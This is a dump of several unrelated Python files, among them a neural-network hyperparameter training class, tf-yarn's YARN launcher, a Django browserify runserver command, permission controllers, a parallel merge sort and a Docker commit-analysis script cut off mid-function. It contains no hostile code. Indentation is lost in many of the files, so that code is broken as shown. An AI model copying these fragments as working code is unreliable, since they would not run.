def check_init_state(self) -> InitState:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
def get_truth_fun_id(self) -> str:
raise NotImplementedError("Abstract method!")
@final
    def stop_file_it_min(self, it_cnt: int, run_time_min: int, /) -> bool:
        # Keep running while the iteration limit has not been reached (or is
        # unset), the stop file still exists (deleting it requests a stop),
        # and the time limit in minutes has not been reached (or is unset).
        return (
            it_cnt < self.arguments_con.hyper_optim_wr.stop_iterations
            or not self.arguments_con.hyper_optim_wr.stop_iterations
        ) and (
            self.stop_file is None
            or (self.stop_file.exists() and self.stop_file.is_file())
        ) and (
            run_time_min < self.arguments_con.hyper_optim_wr.stop_time_min
            or not self.arguments_con.hyper_optim_wr.stop_time_min
        )
@final
@property
def stop_file(self) -> Optional[Path]:
return self.__data_container.stop_op_fp
@final
def stop_file_set(self, file_p: Optional[Path], /) -> None:
if file_p is not None and file_p.exists() and file_p.is_file():
self.__data_container.stop_op_fp = file_p
@final
@property
def arguments_con(self) -> InitNetArgs:
return self.__arguments_con
@final
def is_trainable(self) -> bool:
return self.retrain and not self.random_net
@final
@property
def retrain(self) -> bool:
return self.__data_container.is_trainable[0]
@final
def retrain_set(self, retrain: bool, /) -> None:
self.__data_container.is_trainable = (retrain, self.__data_container.is_trainable[1])
@final
@property
def random_net(self) -> bool:
return self.__data_container.is_trainable[1]
@final
def random_net_set(self, random_net: bool, /) -> None:
self.__data_container.is_trainable = (self.__data_container.is_trainable[0], random_net)
@final
@property
def test_data(self) -> Tuple[Dataset, ...]:
if self.__data_container.test_data is None:
return ()
temp_data = self.re_read_data(DataSetTypes.TEST)
if temp_data is not None:
self.test_data_set(temp_data)
return self.__data_container.test_data
@final
def test_data_set(self, data: Tuple[Dataset, ...], /) -> None:
if not (isinstance(data, tuple) and data):
raise KnownSimpleAnnError("The given test data set was empty")
self.__data_container.test_data = data
@final
@property
def train_data(self) -> Tuple[Dataset, ...]:
if self.__data_container.train_data is None:
return ()
temp_data = self.re_read_data(DataSetTypes.TRAIN)
if temp_data is not None:
self.train_data_set(temp_data)
return self.__data_container.train_data
@final
def train_data_set(self, data: Tuple[Dataset, ...], /) -> None:
if not (isinstance(data, tuple) and data):
raise KnownSimpleAnnError("The given train data set was empty")
self.__data_container.train_data = data
@final
@property
def eval_data(self) -> Tuple[Dataset, ...]:
if self.__data_container.eval_data is None:
return ()
temp_data = self.re_read_data(DataSetTypes.EVAL)
if temp_data is not None:
self.eval_data_set(temp_data)
return self.__data_container.eval_data
@final
def eval_data_set(self, data: Tuple[Dataset, ...], /) -> None:
if not (isinstance(data, tuple) and data):
raise KnownSimpleAnnError("The given eval data set was empty")
self.__data_container.eval_data = data
@final
@property
def savable(self) -> \
Optional[NetSavable[nn.Module, CurrentNetData, _TypeBuffer, InitContainer]]:
return self.__savable
@final
def savable_set(self, savable: NetSavable[
nn.Module, CurrentNetData, _TypeBuffer, InitContainer
], /) -> None:
self.__savable = savable
@final
def get_savable_data(self) -> NetSavable[nn.Module, CurrentNetData, _TypeBuffer, InitContainer]:
if self.__savable is None:
raise KnownSimpleAnnError("Net was not initialised!")
return self.__savable
@final
@property
def net_module(self) -> Optional[SimpleNetCon]:
return self.__net_module
@final
def net_module_set(self, module: SimpleNetCon, /) -> None:
if self.__net_module is not None:
raise KnownSimpleAnnError("Net was already initialised!")
self.__net_module = module
@final
def get_savable_net(self) -> SimpleNetCon:
if self.__net_module is None:
raise KnownSimpleAnnError("Net was not initialised!")
return self.__net_module
@final
def _update_hyper_run(self, hyper_cont: HyperOptimInterfaceArgs,
new_params: Dict[str, HyperOptimReturnElem], /) -> None:
self.get_savable_net().reset_current_net()
self._update_hyper(hyper_cont, new_params)
@final
def _update_hyper(self, hyper_cont: HyperOptimInterfaceArgs,
new_params: Dict[str, HyperOptimReturnElem], /) -> None:
update_hyper_params(self.get_savable_net(), self.arguments_con, new_params)
update_hyper_container(self.arguments_con, hyper_cont)
@final
def _create_train_interface(self, id_file: ANNTreeIdType,
copy: bool, id_mod: str, /) -> TrainerInterfaceArgs:
if self.arguments_con.net_state.get_kwargs().redraw:
self.get_savable_net().redraw_current_net()
if copy:
buf = self.get_savable_net().remove_before_save()
new_mod = deepcopy(self.get_savable_net())
self.get_savable_net().reload_after_save(buf)
else:
new_mod = self.get_savable_net()
new_train_args = TrainerInterfaceArgs(
module=new_mod,
input_train=self.train_data,
input_eval=self.eval_data,
id_file=deepcopy(id_file),
dump=self.arguments_con.net_state.get_kwargs().dump,
cuda=self.arguments_con.net_state.get_kwargs().cuda,
optimizer=deepcopy(self.arguments_con.optimizer_wr)
if copy else self.arguments_con.optimizer_wr,
scheduler=deepcopy(self.arguments_con.scheduler_wr)
if copy else self.arguments_con.scheduler_wr,
criterion=deepcopy(self.arguments_con.criterion_wr)
if copy else self.arguments_con.criterion_wr,
truth_fun_id=self.get_truth_fun_id(),
hyper_str=create_hyper_param_str(self.get_node_name(), self.arguments_con)
)
if id_mod:
new_train_args.id_file.add_modifier(id_mod)
return new_train_args
@final
def _create_stop_file(self, id_file: ANNTreeIdType, /) -> Optional[Path]:
if self.arguments_con.hyper_optim_wr is not None \
and self.arguments_con.hyper_optim_wr.stop_file is not None \
and self.arguments_con.hyper_optim_wr.stop_file.exists() \
and self.arguments_con.hyper_optim_wr.stop_file.is_dir():
merged_str = \
f"{id_file.id_merged_str}_{datetime.now().strftime('%d_%m_%Y__%H_%M_%S')}.lock"
stop_file = self.arguments_con.hyper_optim_wr.stop_file.joinpath(merged_str)
stop_file.touch()
atexit.register(_unlink_if_exists, stop_file)
return stop_file
return None
def _get_new_params(self, generator_optim: HGenTA, fixed_params: _TrFitParam,
run_cont: _RunningConst, /) -> List[Dict[str, HyperOptimReturnElem]]:
run_cnt = 0
l_new_params: List[Dict[str, HyperOptimReturnElem]] = []
while run_cnt < 10 and not l_new_params:
run_cnt += 1
try:
l_new_params = generator_optim.send(fixed_params)
except StopIteration:
run_cont.running = False
run_cnt = 10
else:
run_cont.running = self.stop_file_it_min(run_cont.run_id, run_cont.run_time_min)
if not l_new_params:
run_cont.running = False
return l_new_params
def _train_single(self, sync_out: SyncStdoutInterface, run_cont: _RunningConst,
hyper_cont: HyperOptimInterfaceArgs,
id_file: ANNTreeIdType, /) -> Iterable[TrainNNStatsElementType]:
if self.arguments_con.hyper_optim_wr is None:
raise KnownSimpleAnnError("Hyper-optimiser is not defined!")
generator_optim = self.arguments_con.hyper_optim_wr.hyper.hyper_optim(
sync_out, hyper_cont
)
try:
l_new_params: List[Dict[str, HyperOptimReturnElem]] = next(generator_optim)
except StopIteration:
raise KnownSimpleAnnError("Generator could not be started!")
while run_cont.running:
tr_fit: _TrFitAl = ([], [])
trainer_args = []
for param_id, new_param in enumerate(l_new_params):
run_cont.hyper_cont_buffer = deepcopy(hyper_cont)
self.arguments_con.prepare_wr.init_prepare()
self._update_hyper_run(run_cont.hyper_cont_buffer, new_param)
yield from self.arguments_con.prepare_wr.prepare.run_train(
sync_out, PrepareInterfaceArgs(
trainer=deepcopy(self.arguments_con.trainer_wr.trainer),
trainer_args=self._create_train_interface(
id_file, False, str(run_cont.run_id + param_id)
)
)
)
re_copy_model(
self.arguments_con.prepare_wr.prepare.p_state_dict,
self.get_savable_net().get_net_com
)
tr_fit_res = self.arguments_con.prepare_wr.prepare.fitness
tr_fit[0].append((tr_fit_res[0], _create_hyper_params(run_cont.hyper_cont_buffer)))
tr_fit[1].append(tr_fit_res[1])
trainer_args.append(run_cont.hyper_cont_buffer)
self.get_savable_net().update_current_net(tr_fit_res[0])
run_cont.fit_plotter.update_fitness(tr_fit, trainer_args)
            self._update_hyper(hyper_cont, run_cont.fit_plotter.best_fit_h_param[1])
l_new_params = self._get_new_params(generator_optim, tr_fit[0], run_cont)
yield from run_cont.fit_plotter.plot(
not run_cont.running,
self.arguments_con.net_state.get_kwargs().dump,
run_cont.run_id
)
run_cont.run_id += len(tr_fit[0])
def _train_parallel(self, sync_out: SyncStdoutInterface, run_cont: _RunningConst,
hyper_cont: HyperOptimInterfaceArgs,
id_file: ANNTreeIdType, /) -> Iterable[TrainNNStatsElementType]:
if self.arguments_con.hyper_optim_wr is None:
raise KnownSimpleAnnError("Hyper-optimiser is not defined!")
run_cont.init()
run_cont.start()
self._move_data_sets_to_shared_memory(run_cont.smm)
generator_optim = self.arguments_con.hyper_optim_wr.hyper.hyper_optim(
sync_out, hyper_cont
)
try:
l_new_params: List[Dict[str, HyperOptimReturnElem]] = next(generator_optim)
except StopIteration:
raise KnownSimpleAnnError("Generator could not be started!")
while run_cont.running:
tr_fit: _TrFitAl = ([], [])
trainer_args: _TrainArgs = []
for param_id, new_param in enumerate(l_new_params):
run_cont.hyper_cont_buffer = deepcopy(hyper_cont)
self._update_hyper_run(run_cont.hyper_cont_buffer, new_param)
trainer_args.append((
self._create_train_interface(
id_file, True, str(run_cont.run_id + param_id)
), run_cont.hyper_cont_buffer,
deepcopy(self.arguments_con.trainer_wr.trainer),
deepcopy(self.arguments_con.prepare_wr.prepare)
))
yield from _optimise_in_parallel(
sync_out, self.arguments_con.net_state.get_kwargs().process,
trainer_args, tr_fit
)
for erg_index, erg_tuple in enumerate(tr_fit[0]):
self.get_savable_net().merge_net_model(trainer_args[erg_index][0].module)
self.get_savable_net().update_current_net(erg_tuple[0])
run_cont.fit_plotter.update_fitness(tr_fit, [tr_ar[1] for tr_ar in trainer_args])
            self._update_hyper(hyper_cont, run_cont.fit_plotter.best_fit_h_param[1])
l_new_params = self._get_new_params(generator_optim, tr_fit[0], run_cont)
yield from run_cont.fit_plotter.plot(
not run_cont.running,
self.arguments_con.net_state.get_kwargs().dump,
run_cont.run_id
)
run_cont.run_id += len(tr_fit[0])
run_cont.shutdown()
def train_net(self, id_file: ANNTreeIdType, sync_out: SyncStdoutInterface, /) -> \
Iterable[TrainNNStatsElementType]:
if self.is_trainable():
hyper_cont = create_hyper_arguments(self.arguments_con)
if self.arguments_con.hyper_optim_wr is not None:
self.stop_file_set(self._create_stop_file(id_file))
run_cont = _RunningConst(
fit_plotter=_SimpleTrainDataP(hyper_cont, deepcopy(id_file)),
hyper_cont_buffer=deepcopy(hyper_cont),
init_time=time.time()
)
if self.check_net_state().get_kwargs().process > 1:
yield from self._train_parallel(sync_out, run_cont, hyper_cont, id_file)
else:
yield from self._train_single(sync_out, run_cont, hyper_cont, id_file)
else:
update_hyper_params(
self.get_savable_net(), self.arguments_con, _create_hyper_params(hyper_cont)
)
yield from self.arguments_con.prepare_wr.prepare.run_train(
sync_out, PrepareInterfaceArgs(
trainer=self.arguments_con.trainer_wr.trainer,
trainer_args=self._create_train_interface(id_file, False, "")
)
)
re_copy_model(
self.arguments_con.prepare_wr.prepare.p_state_dict,
self.get_savable_net().get_net_com
)
self.get_savable_net().update_current_net(
self.arguments_con.prepare_wr.prepare.fitness[0]
)
self.get_savable_net().set_best_net()
def test_net(self, id_file: ANNTreeIdType, sync_out: SyncStdoutInterface, /) \
-> Tuple[TestNNStatsElementType, ...]:
module_net = self.get_savable_net()
return self.arguments_con.tester_wr.tester.test(
sync_out,
TesterInterfaceArgs(
module=module_net,
input_test=self.test_data,
id_file=deepcopy(id_file),
cuda=self.arguments_con.net_state.get_kwargs().cuda,
truth_fun_id=self.get_truth_fun_id()
)
)
@final
def finalize(self) -> None:
self.__data_container.eval_data = None
self.__data_container.train_data = None
self.__data_container.test_data = None
self.__data_container.stop_op_fp = None
|
__init__.py
|
# Copyright 2018 Criteo
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hashlib
import logging
import os
import time
import typing
from contextlib import suppress, contextmanager
from enum import Enum
from sys import version_info as v
from tempfile import NamedTemporaryFile
from threading import Thread
import dill
import skein
import tensorflow as tf
from skein.exceptions import SkeinError
from skein.model import FinalStatus, ApplicationReport
from ._criteo import get_default_env
from ._internal import (
dump_fn,
iter_tasks,
zip_inplace,
StaticDefaultDict,
create_and_pack_conda_env
)
__all__ = [
"Experiment",
"run_on_yarn", "RunFailed", "NodeLabel", "TaskSpec",
]
logger = logging.getLogger(__name__)
here = os.path.dirname(__file__)
class Experiment(typing.NamedTuple):
estimator: tf.estimator.Estimator
train_spec: tf.estimator.TrainSpec
eval_spec: tf.estimator.EvalSpec
# TODO: experiment name?
@property
def config(self) -> tf.estimator.RunConfig:
return self.estimator.config
ExperimentFn = typing.Callable[[], Experiment]
class NodeLabel(Enum):
"""YARN node label expression.
    A task with a CPU label can be scheduled on any node, whereas a task
    with a GPU label can only be scheduled on nodes labeled ``"gpu"``.
"""
CPU = "" # Default.
GPU = "gpu"
class TaskSpec(typing.NamedTuple):
memory: int
vcores: int
instances: int = 1
label: NodeLabel = NodeLabel.CPU
#: A "dummy" ``TaskSpec``.
TaskSpec.NONE = TaskSpec(0, 0, 0)
class RunFailed(Exception):
"""``run_on_yarn`` failed."""
def run_on_yarn(
experiment_fn: ExperimentFn,
task_specs: typing.Dict[str, TaskSpec],
*,
python: str = f"{v.major}.{v.minor}.{v.micro}",
pip_packages: typing.List[str] = None,
files: typing.Dict[str, str] = None,
env: typing.Dict[str, str] = None,
queue: str = "default",
file_systems: typing.List[str] = None
) -> None:
"""Run an experiment on YARN.
The implementation allocates a service with the requested number
of instances for each distributed TensorFlow task type. Each
instance runs ``_dispatch_task`` which roughly does the following.
1. Reserve a TCP port and communicate the resulting socket address
(host/port pair) to other instances using the "init" barrier.
2. Spawn ``train_and_evaluate`` in a separate thread.
3. Synchronize the "ps" tasks on the "stop" barrier.
The barrier compensates for the fact that "ps" tasks never
terminate, and therefore should be killed once all other
tasks are finished.
Parameters
----------
experiment_fn
A function constructing the estimator alongside the train
and eval specs.
task_specs
Resources to allocate for each task type. The keys
must be a subset of ``"chief"``, ``"worker"``, ``"ps"``, and
``"evaluator"``. The minimal spec must contain at least
``"chief"``.
python
Python version in the MAJOR.MINOR.MICRO format. Defaults to the
version of ``sys.executable``.
pip_packages
Python packages to install in the environment. The packages
are installed via pip, therefore all of the following forms
are supported::
SomeProject>=1,<2
git+https://github.com/org/SomeProject
http://SomeProject.org/archives/SomeProject-1.0.4.tar.gz
path/to/SomeProject
See `Installing Packages <https://packaging.python.org/tutorials \
/installing-packages>`_ for more examples.
files
Local files or directories to upload to the container.
The keys are the target locations of the resources relative
to the container root, while the values -- their
        corresponding local sources. Note that the container root is
        prepended to ``PYTHONPATH``. Therefore, any listed Python
        module or package is automatically importable.
env
Environment variables to forward to the containers.
queue
YARN queue to use.
file_systems
A list of namenode URIs to acquire delegation tokens for
in addition to ``fs.defaultFS``.
Raises
------
RunFailed
If the final status of the YARN application is ``"FAILED"``.
"""
# TODO: compute num_ps from the model size and the number of
# executors. See https://stackoverflow.com/a/46080567/262432.
task_specs = StaticDefaultDict(task_specs, default=TaskSpec.NONE)
_check_task_specs(task_specs)
task_files = _maybe_zip_task_files(files or {})
task_files[__package__] = zip_inplace(here, replace=True)
with NamedTemporaryFile(suffix=".dill", delete=False) as file:
dump_fn(experiment_fn, file.name)
task_files["experiment_fn.dill"] = file.name
task_env = {
# XXX this is Criteo-specific. Remove once Lake updates the
# container environment. See LAKE-709.
**get_default_env(),
**(env or {}),
# Make Python modules/packages passed via ``files`` importable.
"PYTHONPATH": ".:" + (env or {}).get("PYTHONPATH", ""),
}
pyenvs = _make_conda_envs(python, pip_packages or [])
services = {}
for task_type, task_spec in list(task_specs.items()):
task_command = (
f"pyenv/bin/python -m tf_yarn._dispatch_task "
f"--num-ps={task_specs['ps'].instances} "
f"--num-workers={task_specs['worker'].instances} "
"--experiment-fn=experiment_fn.dill"
)
services[task_type] = skein.Service(
[task_command],
skein.Resources(task_spec.memory, task_spec.vcores),
max_restarts=0,
instances=task_spec.instances,
node_label=task_spec.label.value,
files={**task_files, "pyenv": pyenvs[task_spec.label]},
env=task_env)
tasks = list(iter_tasks(
task_specs["worker"].instances,
task_specs["ps"].instances))
if "evaluator" in task_specs:
tasks.append("evaluator:0") # Not part of the cluster.
spec = skein.ApplicationSpec(services, queue=queue, name_nodes=file_systems)
with skein.Client() as client:
_submit_and_await_termination(client, spec, tasks)
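# Editor's note: a minimal, hypothetical invocation of run_on_yarn; the
# experiment body and resource figures are illustrative only.
#
#     def my_experiment() -> Experiment:
#         estimator = tf.estimator.Estimator(model_fn=my_model_fn)
#         return Experiment(
#             estimator,
#             tf.estimator.TrainSpec(train_input_fn, max_steps=1000),
#             tf.estimator.EvalSpec(eval_input_fn))
#
#     run_on_yarn(
#         my_experiment,
#         task_specs={
#             "chief": TaskSpec(memory=4096, vcores=4),
#             "evaluator": TaskSpec(memory=2048, vcores=1),
#         })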
def _check_task_specs(task_specs):
all_task_types = {"chief", "worker", "ps", "evaluator"}
if not task_specs.keys() <= all_task_types:
raise ValueError(
f"task_specs.keys() must be a subset of: {all_task_types}")
if task_specs["chief"].instances != 1:
raise ValueError("exactly one 'chief' task is required")
if task_specs["evaluator"].instances > 1:
raise ValueError("no more than one 'evaluator' task is allowed")
if task_specs["worker"].instances > 0 and not task_specs["ps"].instances:
raise ValueError(
"task_specs must contain at least a single 'ps' task for "
"multi-worker training")
def _maybe_zip_task_files(files):
task_files = {}
for target, source in files.items():
assert target not in task_files
if os.path.isdir(source):
source = zip_inplace(source, replace=True)
task_files[target] = source
return task_files
def _make_conda_envs(python, pip_packages) -> typing.Dict[NodeLabel, str]:
fp = hashlib.md5(str(pip_packages).encode()).hexdigest()
base_packages = [
"dill==" + dill.__version__,
"git+http://github.com/criteo-forks/skein"
]
# TODO: use internal PyPI for CPU-optimized TF.
# TODO: make the user responsible for constructing this mapping.
return {
NodeLabel.CPU: create_and_pack_conda_env(
f"py{python}-{fp}-cpu",
python,
pip_packages + base_packages + ["tensorflow==" + tf.__version__]
),
NodeLabel.GPU: create_and_pack_conda_env(
f"py{python}-{fp}-gpu",
python,
pip_packages + base_packages + [
"tensorflow-gpu==" + tf.__version__
]
)
}
@contextmanager
def _shutdown_on_exception(app: skein.ApplicationClient):
# Ensure SIGINT is not masked to enable kill on C-c.
import signal
signal.signal(signal.SIGINT, signal.default_int_handler)
try:
yield
except (KeyboardInterrupt, SystemExit):
with suppress(SkeinError):
app.shutdown(FinalStatus.KILLED)
logger.error("Application killed on user request")
except Exception:
with suppress(SkeinError):
app.shutdown(FinalStatus.FAILED)
logger.exception("Application shutdown due to an exception")
raise
def _submit_and_await_termination(
client: skein.Client,
spec: skein.ApplicationSpec,
tasks: typing.List[str],
poll_every_secs: int = 10
):
app = client.submit_and_connect(spec)
events = {task: {} for task in tasks}
event_listener = Thread(target=_aggregate_events, args=(app.kv, events))
event_listener.start()
with _shutdown_on_exception(app):
state = None
while True:
report = client.application_report(app.id)
logger.info(
f"Application report for {app.id} (state: {report.state})")
if state != report.state:
logger.info(_format_app_report(report))
if report.final_status != "undefined":
event_listener.join()
logger.info(_format_run_summary(events))
if report.final_status == "failed":
raise RunFailed
else:
break
time.sleep(poll_every_secs)
state = report.state
def _format_app_report(report: ApplicationReport) -> str:
attrs = [
"queue",
"start_time",
"finish_time",
"final_status",
"tracking_url",
"user"
]
return os.linesep + os.linesep.join(
f"{attr:>16}: {getattr(report, attr) or ''}" for attr in attrs)
def _aggregate_events(
kv: skein.kv.KeyValueStore,
events: typing.Dict[str, typing.Dict[str, str]]
) -> None:
"""
Aggregate events from all dispatched tasks.
The lifecycle of a task consists of three stages:
* init which carries the reserved socket address,
* start with no payload, and
* stop with an optional formatted exception.
"""
# ``ConnectionError`` indicates that the app has finished and
# the AM is down.
queue = kv.events(event_type="PUT")
with suppress(skein.exceptions.ConnectionError), queue:
for event in queue:
task, stage = event.key.rsplit("/", 1)
events[task][stage] = event.result.value.decode()
def _format_run_summary(
events: typing.Dict[str, typing.Dict[str, str]]
) -> str:
header = []
details = []
for task, stages in sorted(events.items()):
if "stop" in stages:
status = "FAILED" if stages["stop"] else "SUCCEEDED"
elif stages:
status = "KILLED"
else:
# No events -- container was never started.
status = "REQUESTED"
sock_addr = stages.get("init", "")
exception = stages.get("stop", "")
header.append(f"{task:>16} {sock_addr} {status}")
if exception:
details.append(f"Exception in task {task}:")
details.append(exception)
return (os.linesep + os.linesep.join(header)
+ os.linesep * (1 + bool(details))
+ os.linesep.join(details))
|
runserver.py
|
from __future__ import print_function
import atexit
import os
import psutil
import subprocess
import sys
import traceback
from signal import SIGTERM
from threading import Thread
from django.contrib.staticfiles.management.commands.runserver import Command as RunserverCommand
from django.core.management.base import CommandError
from django.core.servers import basehttp
class Command(RunserverCommand):
"""
Subclass the RunserverCommand from Staticfiles to run browserify.
"""
def __init__(self, *args, **kwargs):
self.cleanup_closing = False
self.browserify_process = None
super(Command, self).__init__(*args, **kwargs)
def handle(self, *args, **options):
        # We're subclassing runserver, which spawns threads for its
        # autoreloader with RUN_MAIN set to true, so we have to check for
        # this to avoid running browserify twice.
if not os.getenv('RUN_MAIN', False) and not getattr(self, "browserify_process"):
browserify_thread = Thread(target=self.start_browserify)
browserify_thread.daemon = True
browserify_thread.start()
atexit.register(self.kill_browserify_process)
return super(Command, self).handle(*args, **options)
def kill_browserify_process(self):
if self.browserify_process.returncode is not None:
return
self.cleanup_closing = True
self.stdout.write('Closing browserify process')
self.browserify_process.terminate()
def start_browserify(self):
self.stdout.write('Starting browserify')
self.browserify_process = subprocess.Popen(
'node ../build.js --watch --debug',
shell=True,
stdin=subprocess.PIPE,
stdout=self.stdout,
stderr=self.stderr)
if self.browserify_process.poll() is not None:
raise CommandError('Browserify failed to start')
self.stdout.write('Browserify process on pid {0}'
.format(self.browserify_process.pid))
self.browserify_process.wait()
if self.browserify_process.returncode != 0 and not self.cleanup_closing:
self.stdout.write(
"""
****************************************************************************
Browserify exited unexpectedly - Javascript code will not be properly built.
****************************************************************************
""")
|
threading_simple.py
|
#!/usr/bin/env python
# encoding: UTF-8
import threading
def worker():
    print('Worker')
    return
threads = []
for i in range(5):
    t = threading.Thread(target=worker)
    threads.append(t)
    t.start()
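# Optional (not in the original): wait for every worker to finish so the
# interpreter does not exit while threads are still printing.
for t in threads:
    t.join()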
|
permission_controllers.py
|
import random
from builtins import callable, getattr
from multiprocessing import Manager, Pool, Process
class PraxoPermission:
def _permission_controller_forsure(self, user_obj, **kwargs):
        results = []
        print(kwargs)
        for key, value in kwargs.items():
            if callable(getattr(user_obj, 'has_perm')):
                print("{0}.{1}".format(key, value))
                results.append(user_obj.has_perm("{0}.{1}".format(key, value)))
            else:
                results.append(False)
        print("in _permission_controller_forsure and result is:")
        print(results)
        return results
def general_permission_controller(user, **kwargs):
p = PraxoPermission()
    return p._permission_controller_forsure(user, **kwargs)
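# Example usage (hypothetical Django user and permission; permissions follow
# the usual "app_label.codename" convention assumed above):
#   general_permission_controller(request.user, healthrecords="view_record")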
from rest_framework.permissions import IsAuthenticated
class RestFrameworkPermissionController(IsAuthenticated):
def has_permission(self, request, view):
resp = super(RestFrameworkPermissionController, self).has_permission(request, view)
print('Inside RestFrameworkPermissionController and user is: {0}, {1}'.format(request.user, request.user.is_superuser))
roles = request.user.roles.all()
if roles:
for role in request.user.roles.all():
if 4 == role.role_id or request.user.is_superuser:
if request.user.is_active and resp:
return True
else:
if request.user.is_superuser and request.user.is_active and resp:
return True
return False
# return getattr(request.user, "user_type", None) == "A" and resp
# Multiprocessing was implemented and tested.
# For cases like this, multiprocessing is neither usual nor handy; the
# version below was written purely as a multiprocessing exercise and it
# raises an error. It is kept here, commented out, so nobody has to test
# it again.
# Just in case anyone assumes importing these could solve the problem:
# from django.contrib.auth.models import User
# from healthrecords import models
# from healthstandards import models
# from commons import models as model1
# def _permission_controller(user, **kwargs):
# p = Pool()
# result = p.starmap(_check_permission, user, kwargs)
# print(result)
# def _check_permission(user_obj, app, perm, res):
# print('here4')
# if callable(getattr(user_obj, has_perm)):
# print("{0}.{1}".format(app,perm))
# res.append(user_obj.has_perm("{0}.{1}".format(app,perm)))
# else: res.append(False)
# print("in _check_permission and params are: {0}, {1}".format(app, perm))
# def _permission_controller(user_obj, **kwargs):
# manager = Manager()
# d = manager.dict(**kwargs)
# l, jobs, i = [], [], 0
# print(kwargs)
# for key, value in kwargs.items():
# print('here')
# p = Process(target=_check_permission, args=(user_obj.id, key, value, l))
# print('here1')
# jobs.append(p)
# print('here2')
# p.start()
# print('here3')
# for proc in jobs:
# print(proc)
# proc.join()
# print("in _permission_controller and result is:")
# print(l)
|
Parallel_MergeSort.py
|
#!/usr/bin/env python3
""" Merge Sort Algorithm for Sort an array of random integers with parallel and sequential apporach is used."""
import random
import math
import multiprocessing as mp
""" helper method to merge two sorted subarrays
array[l..m] and array[m+1..r] into array """
def merge(array, left, mid, right):
# copy data to temp subarrays to be merged
left_temp_arr = array[left:mid+1].copy()
right_temp_arr = array[mid+1:right+1].copy()
# initial indexes for left, right and merged subarrays
left_temp_index = 0
right_temp_index = 0
merge_index = left
# merge temp arrays into original
while (left_temp_index < (mid - left + 1) or right_temp_index < (right - mid)):
if (left_temp_index < (mid - left + 1) and right_temp_index < (right - mid)):
if (left_temp_arr[left_temp_index] <= right_temp_arr[right_temp_index]):
array[merge_index] = left_temp_arr[left_temp_index]
left_temp_index += 1
else:
array[merge_index] = right_temp_arr[right_temp_index]
right_temp_index += 1
elif (left_temp_index < (mid - left + 1)): # copy any remaining on left side
array[merge_index] = left_temp_arr[left_temp_index]
left_temp_index += 1
elif (right_temp_index < (right - mid)): # copy any remaining on right side
array[merge_index] = right_temp_arr[right_temp_index]
right_temp_index += 1
merge_index += 1
""" parallel implementation of merge sort """
def parallel_mergesort(array, *args):
if not args: # first call
shared_array = mp.RawArray('i', array)
parallel_mergesort(shared_array, 0, len(array)-1, 0)
array[:] = shared_array # insert result into original array
return array
else:
left, right, depth = args
if (left < right):
mid = left + ((right - left) // 2)
left_proc = mp.Process(target=parallel_mergesort, args=(array, left, mid, depth+1))
left_proc.start()
parallel_mergesort(array, mid+1, right, depth+1)
left_proc.join()
merge(array, left, mid, right)
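# Note (a sketch, not in the original): the recursion above forks one new
# process per split, so an array of n elements spawns O(n) processes. A
# common refinement is to stop forking once depth exceeds roughly
# log2(mp.cpu_count()) and sort the remaining slice sequentially instead.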
if __name__ == '__main__':
NUM_EVAL_RUNS = 1
userRange = int(input("Enter your range for generating random array: "))
print('Generating Random Array...')
array = [random.randint(0,10_000) for i in range(userRange)]
strRandomArray = ','.join([str(i) for i in array])
print('Random Array to Sort is : ' + strRandomArray)
print('Evaluating Parallel Implementation...')
parallel_result = parallel_mergesort(array.copy())
for i in range(NUM_EVAL_RUNS):
parallel_mergesort(array.copy())
    strfinalSortResult = ','.join([str(i) for i in parallel_result])
print('final Parallel approach sorted array is : '+ strfinalSortResult)
# input/output sample
# Enter your range for generating random array: 10
# Generating Random Array...
# Random Array to Sort is : 1807,7508,7166,7673,2000,1356,7665,4670,9395,6002
# Evaluating Parallel Implementation...
# final sorted array is : 1356,1807,2000,4670,6002,7166,7508,7665,7673,9395
# Time Complexity: O(nLog(n)) in worst case
#Space Complexity: O(n) in worst case
|
assemble_features.py
|
"""
Script that runs several docker containers which in turn runs an analysis on
a git repository.
"""
__author__ = "Oscar Svensson"
__copyright__ = "Copyright (c) 2018 Axis Communications AB"
__license__ = "MIT"
import os
import sys
import shutil
import time
from argparse import ArgumentParser
from distutils.dir_util import copy_tree
from multiprocessing import Process, cpu_count
from git import Repo
from tqdm import tqdm
import docker
def start_container(client, image, name, repo_dir, result_dir):
"""
Function that starts a docker container and links the repo into it and
a directory where the results are stored.
"""
for container in client.containers.list(all=True):
if name == container.name:
if container.status == "running":
container.kill()
container.remove()
path = os.path.abspath('./')
container = client.containers.run(
image,
name=name,
stdin_open=True,
detach=True,
volumes={
str(path + "/scripts"): {
'bind': '/root/scripts',
'mode': 'rw'
},
result_dir: {
'bind': '/root/results',
'mode': 'rw'
},
os.path.abspath(repo_dir): {
'bind': '/root/repo',
'mode': 'rw'
}
},
command="bash")
return container
def run_command(container, command):
"""
Function that executes a command inside a container.
"""
return container.exec_run(
cmd="bash -c \"" + command + "\"", tty=True, privileged=True)
def run_analysis(t_id, container, commits):
"""
Function that runs a command inside all docker container.
"""
for commit in tqdm(
commits, desc="Progress process {}".format(t_id), position=t_id):
run_command(container,
"/root/scripts/analyse_commit {}".format(commit))
def copy_repo(src, dest):
"""
Helper function to copy a repository to another destination.
"""
try:
shutil.copytree(src, dest)
except shutil.Error as exp:
print("Directory not copied. Error: {}".format(exp))
except OSError as exp:
print("Directory not copied. Error: {}".format(exp))
def partition_commits(commits, partitions):
    """
    Function that divides commits into evenly sized partitions.
    """
    quot, remainder = divmod(len(commits), partitions)
    chunk_commits = [(i * quot + min(i, remainder),
                      (i + 1) * quot + min(i + 1, remainder))
                     for i in range(partitions)]
    commits = [commits[start:end] for start, end in chunk_commits]
return commits
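# Worked example: 10 commits over 3 partitions gives divmod(10, 3) == (3, 1),
# so the chunk boundaries are (0, 4), (4, 7) and (7, 10) -- partition sizes
# 4, 3 and 3, with the remainder spread over the first partitions.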
def start_analysis(image, result_dir, commits=None, cpus=cpu_count()):
"""
This function starts a docker container that can analyze a git repository. It starts several
containers if the cpus are more than one.
"""
client = docker.from_env()
repo = Repo(REPO)
    # Since the containers work directly on the repository, each one
    # needs its own separate copy.
if not os.path.exists("./repos"):
os.makedirs("./repos")
repo_name = os.path.basename(os.path.normpath(REPO))
for cpu in range(cpus):
copy_repo(REPO, "./repos/{}{}".format(repo_name, cpu))
# Split the commits into even parts.
if not commits:
